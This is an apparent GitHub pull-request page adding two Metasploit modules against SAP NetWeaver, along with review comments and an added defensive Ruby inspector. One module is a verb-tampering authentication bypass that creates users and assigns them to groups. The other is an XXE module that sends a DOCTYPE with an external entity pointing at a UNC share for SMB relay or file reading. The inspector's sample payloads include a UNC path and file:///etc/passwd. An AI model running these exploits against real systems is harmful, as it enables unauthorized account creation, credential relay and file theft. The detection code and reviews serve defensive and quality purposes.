
SAP /sap/bw/xml/soap/xmla XMLA service (XML DOCTYPE) SMB relay #1653

Closed
wants to merge 2 commits into from

1 participant

nmonkee

This module exploits the SAP NetWeaver BW XML External Entity vulnerability. An XML External Entities (XXE) issue exists within the XMLA service (XML DOCTYPE) function. The XXE vulnerability in SAP BW can lead to arbitrary file reading or an SMBRelay attack.

SAP Note 1597066 / DSECRG-12-033.

ref: http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity
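For defenders reading this, an added example that is not part of the pull request or of the Metasploit project: a small Ruby inspector that flags request bodies sent to the /sap/bw/xml/soap/xmla endpoint which carry a DOCTYPE with an external SYSTEM entity, and classifies the entity target as a UNC share (the SMB relay case) or a local file (the file-read case). The sample requests and the 192.0.2.10 address are constructed for the example.

```ruby
# Added example (not from the pull request): flag XXE-shaped requests aimed at
# the SAP BW XMLA endpoint so proxy/WAF logs can be checked for this pattern.
require 'uri'

XMLA_PATH = '/sap/bw/xml/soap/xmla'

# Matches an external entity declaration: <!ENTITY name SYSTEM "target">
ENTITY_RE = /<!ENTITY\s+(\S+)\s+SYSTEM\s+["']([^"']+)["']/i

# Classify where an external entity's SYSTEM identifier points.
def classify_target(target)
  return :unc_share  if target.start_with?('\\\\') || target.start_with?('//')
  return :local_file if target =~ /\A(file:)?\/|\A[a-z]:\\/i
  return :remote_url if target =~ /\A(https?|ftp):\/\//i
  :other
end

# Inspect one HTTP request (request path with query, plus body).
# Returns nil when the request is not of interest, otherwise a finding hash.
def inspect_request(path, body)
  return nil unless URI(path).path == XMLA_PATH
  return nil unless body =~ /<!DOCTYPE/i
  m = ENTITY_RE.match(body)
  return { reason: :doctype_present, entity: nil, target: nil, kind: nil } unless m
  { reason: :external_entity, entity: m[1], target: m[2], kind: classify_target(m[2]) }
end

# Run the inspector over [path, body] pairs and return only the findings.
def scan_requests(requests)
  requests.map { |path, body| inspect_request(path, body) }.compact
end

# Constructed sample traffic: one benign XMLA call and two XXE attempts.
SAMPLE_REQUESTS = [
  ['/sap/bw/xml/soap/xmla?sap-client=001&sap-language=EN',
   '<?xml version="1.0"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' \
   '<soap:Body><Discover/></soap:Body></soap:Envelope>'],
  ['/sap/bw/xml/soap/xmla?sap-client=001&sap-language=EN',
   '<!DOCTYPE root [<!ENTITY foo SYSTEM "\\\\192.0.2.10\\share">]><in>&foo;</in>'],
  ['/sap/bw/xml/soap/xmla?sap-client=001',
   '<!DOCTYPE root [<!ENTITY foo SYSTEM "file:///etc/passwd">]><in>&foo;</in>']
]

if __FILE__ == $0
  scan_requests(SAMPLE_REQUESTS).each do |f|
    puts "#{f[:reason]} entity=#{f[:entity].inspect} target=#{f[:target].inspect} kind=#{f[:kind]}"
  end
end
```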

nmonkee nmonkee closed this March 25, 2013
nmonkee nmonkee deleted the branch March 25, 2013
81  modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_add_user_and_add_role.rb
@@ -0,0 +1,81 @@
  1
+##
  2
+# This file is part of the Metasploit Framework and may be subject to
  3
+# redistribution and commercial restrictions. Please see the Metasploit
  4
+# Framework web site for more information on licensing and terms of use.
  5
+# http://metasploit.com/framework/
  6
+##
  7
+
  8
+##
  9
+# This module is based on, inspired by, or is a port of a plugin available in
  10
+# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
  11
+# http://www.onapsis.com/research-free-solutions.php.
  12
+# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
  13
+# in producing the Metasploit modules and was happy to share his knowledge and
  14
+# experience - a very cool guy.
  15
+#
  16
+# The following guys from ERP-SCAN deserve credit for their contributions -
  17
+# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and
  18
+# Dmitry Evdokimov.
  19
+#
  20
+# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
  21
+# who have Beta tested the modules and provided excellent feedback. Some people
  22
+# just seem to enjoy hacking SAP :)
  23
+##
  24
+
  25
+require 'msf/core'
  26
+
  27
+class Metasploit4 < Msf::Auxiliary
  28
+	include Msf::Exploit::Remote::HttpClient
  29
+	include Msf::Auxiliary::Report
  30
+	include Msf::Auxiliary::Scanner
  31
+
  32
+	def initialize
  33
+		super(
  34
+			'Name' => 'SAP CTC Service Verb Tampering (add user and add role)',
  35
+			'Description' => %q{
  36
+									This module exploits an authentication bypass vulnerability in SAP NetWeaver CTC service.
  37
+									The service is vulnerable to verb tampering and allows for unauthorised user management.
  38
+									SAP Note 1589525, 1624450 / DSECRG-11-041.
  39
+								},
  40
+			'References' => [['URL','http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/']],
  41
+			'Author' => ['nmonkee'],
  42
+			'License' => MSF_LICENSE
  43
+			)
  44
+
  45
+		register_options([
  46
+			OptString.new('USER', [true, 'Username', nil]),
  47
+			OptString.new('PASS', [true, 'Password', nil]),
  48
+			OptString.new('GROUP', [true, 'Group', nil])
  49
+			], self.class)
  50
+	end
  51
+
  52
+	def run_host(ip)
  53
+		uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=' + datastore['USER'] + ',PASSWORD=' + datastore['PASS']
  54
+		send_request(uri)
  55
+		uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=' + datastore['USER'] + ',GROUPNAME=' + datastore['GROUP']
  56
+		send_request(uri)
  57
+	end
  58
+
  59
+	def send_request(uri)
  60
+		begin
  61
+			print_status("[SAP] #{rhost}:#{rport} - sending request")
  62
+			res = send_request_raw({
  63
+				'uri' => uri,
  64
+				'method' => 'HEAD',
  65
+				'headers' =>{
  66
+					'Cookie' => 'sap-usercontext=sap-language=EN',
  67
+					'Content-Type' => 'text/xml; charset=UTF-8',}
  68
+				}, 45)
  69
+			if res
  70
+				if datastore['VERBOSE'] == true
  71
+					print_status("[SAP] #{rhost}:#{rport} - Error code: " + res.code.to_s)
  72
+					print_status("[SAP] #{rhost}:#{rport} - Error title: " + res.message.to_s)
  73
+					print_status("[SAP] #{rhost}:#{rport} - Error message: " + res.body.to_s)
  74
+				end
  75
+			end
  76
+			rescue ::Rex::ConnectionError
  77
+				print_error("#{rhost}:#{rport} - Unable to connect")
  78
+				return
  79
+			end
  80
+		end
  81
+	end
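Review bot: run_host discards the result of both send_request calls, and send_request only prints the status code when VERBOSE is set, so a scan never reports whether the user was created or the group assignment succeeded, and nothing is recorded through the Report mixin the module includes. Suggest having send_request return res, then in run_host test res.code after each request (print_good on success, print_error otherwise) and call report_vuln once the bypass is confirmed. The USER, PASS and GROUP values are also concatenated raw into the query string; pass them through Rex::Text.uri_encode so values containing spaces or the `;`, `,` and `=` separators do not break the param syntax. Finally, this module is unrelated to the XMLA SMB relay change named in the PR title and would be cleaner as its own pull request.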
85  modules/auxiliary/scanner/sap/sap_soap_xmla_bw_smb_relay.rb
@@ -0,0 +1,85 @@
  1
+##
  2
+# This file is part of the Metasploit Framework and may be subject to
  3
+# redistribution and commercial restrictions. Please see the Metasploit
  4
+# Framework web site for more information on licensing and terms of use.
  5
+# http://metasploit.com/framework/
  6
+##
  7
+
  8
+##
  9
+# This module is based on, inspired by, or is a port of a plugin available in
  10
+# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
  11
+# http://www.onapsis.com/research-free-solutions.php.
  12
+# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
  13
+# in producing the Metasploit modules and was happy to share his knowledge and
  14
+# experience - a very cool guy.
  15
+#
  16
+# The following guys from ERP-SCAN deserve credit for their contributions -
  17
+# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and
  18
+# Dmitry Evdokimov.
  19
+#
  20
+# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
  21
+# who have Beta tested the modules and provided excellent feedback. Some people
  22
+# just seem to enjoy hacking SAP :)
  23
+##
  24
+
  25
+require 'msf/core'
  26
+
  27
+class Metasploit4 < Msf::Auxiliary
  28
+	include Msf::Exploit::Remote::HttpClient
  29
+	include Msf::Auxiliary::Report
  30
+	include Msf::Auxiliary::Scanner
  31
+
  32
+	def initialize
  33
+		super(
  34
+			'Name' => 'SAP /sap/bw/xml/soap/xmla XMLA service (XML DOCTYPE) SMB relay',
  35
+			'Description' => %q{
  36
+				This module exploits the SAP NetWeaver BW XML External Entity vulnerability.
  37
+				An XML External Entities (XXE) issue exists within the XMLA service (XML DOCTYPE) function.
  38
+				The XXE vulnerability in SAP BW can lead to arbitary file reading or an SMBRelay attack.
  39
+				SAP Note 1597066 / DSECRG-12-033.
  40
+				},
  41
+			'References' => [['URL','http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity/']],
  42
+			'Author' => ['nmonkee'],
  43
+			'License' => MSF_LICENSE
  44
+			)
  45
+
  46
+		register_options([
  47
+			OptString.new('CLIENT', [true, 'SAP client', nil]),
  48
+			OptString.new('USER', [true, 'Username', nil]),
  49
+			OptString.new('PASS', [true, 'Password', nil]),
  50
+			OptString.new('PATH',[true,'File path (e.g. \\xx.xx.xx.xx\share)',nil])
  51
+			], self.class)
  52
+	end
  53
+
  54
+	def run_host(ip)
  55
+		data = '<?xml version="1.0" encoding="utf-8" ?>'
  56
+		data = '<!DOCTYPE root ['
  57
+		data << '<!ENTITY foo SYSTEM "' + datastore['PATH'] + '">'
  58
+		data << ']>'
  59
+		data << '<in>&foo;</in>'
  60
+		user_pass = Rex::Text.encode_base64(datastore['USER'] + ":" + datastore['PASS'])
  61
+		begin
  62
+			print_status("[SAP] #{ip}:#{rport} - sending request for #{datastore['PATH']}")
  63
+			res = send_request_raw({
  64
+				'uri' => '/sap/bw/xml/soap/xmla?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
  65
+				'method' => 'POST',
  66
+				'data' => data,
  67
+				'headers' =>{
  68
+					'Content-Length' => data.size.to_s,
  69
+					'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
  70
+					'Authorization' => 'Basic ' + user_pass,
  71
+					'Content-Type' => 'text/xml; charset=UTF-8',}
  72
+					}, 45)
  73
+			if res
  74
+				if datastore['VERBOSE'] == true
  75
+					print_status("[SAP] #{rhost}:#{rport} - Error code: " + res.code.to_s)
  76
+					print_status("[SAP] #{rhost}:#{rport} - Error title: " + res.message.to_s)
  77
+					print_status("[SAP] #{rhost}:#{rport} - Error message: " + res.body.to_s)
  78
+				end
  79
+			end
  80
+			rescue ::Rex::ConnectionError
  81
+				print_error("#{rhost}:#{rport} - Unable to connect")
  82
+				return
  83
+			end
  84
+		end
  85
+	end
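Review bot: in run_host the second assignment `data = '<!DOCTYPE root ['` overwrites the XML declaration built on the line before it instead of appending; it should be `data << '<!DOCTYPE root ['` so the body actually starts with `<?xml version="1.0" encoding="utf-8" ?>`. As in the other module, the response is only printed under VERBOSE and never evaluated, so the scanner cannot tell a vulnerable host from a patched one; check res.code and the response body and call report_vuln accordingly. Minor points: the PATH option description is a single-quoted string, so `'\\xx.xx.xx.xx\share'` renders with only one leading backslash; the status messages mix `ip` and `rhost`; and "arbitary" in the Description should read "arbitrary".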